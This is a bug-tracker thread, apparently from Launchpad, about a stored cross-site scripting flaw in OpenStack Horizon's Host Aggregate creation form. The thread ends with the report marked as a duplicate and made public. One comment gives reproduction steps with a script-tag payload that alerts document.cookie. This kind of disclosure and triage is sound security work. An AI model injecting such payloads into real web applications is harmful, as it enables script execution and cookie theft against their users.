Looking at stable releases, Icehouse seems also affected, can Horizon core-sec look at Havana impact ?

Revision history for this message
Julie Pichon (jpichon) wrote :

Hi Michael, thank you for the bug report. Would you mind confirming the steps to follow to reproduce the bug? When I saw the beginning of the description mentioning "/admin/aggregates/1/update" I thought it might be a place that was missed when fixing bug 1349491, but perhaps not, as I can't quite reproduce it with only this information. Thank you.

Revision history for this message
Michael Xin (michael-xin) wrote :

Thanks for working on this. First, log into the control panel, click on Host Aggregate, then click the button "Create Host Aggregate", In the Name field, put "testzy", in the availability zone, put "test<script>alert(document.cookie)</script>", then click "create host aggregate" button. You can see the popup then.

Revision history for this message
Michael Xin (michael-xin) wrote :

It should be the same issue as bug 1349491. I can try to get the latest version and try again some time later.

Revision history for this message
Julie Pichon (jpichon) wrote :

Thank you for the reply! The steps you provided do indicate this is a duplicate, sorry about the initial triaging delay.

Thierry Carrez (ttx)
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.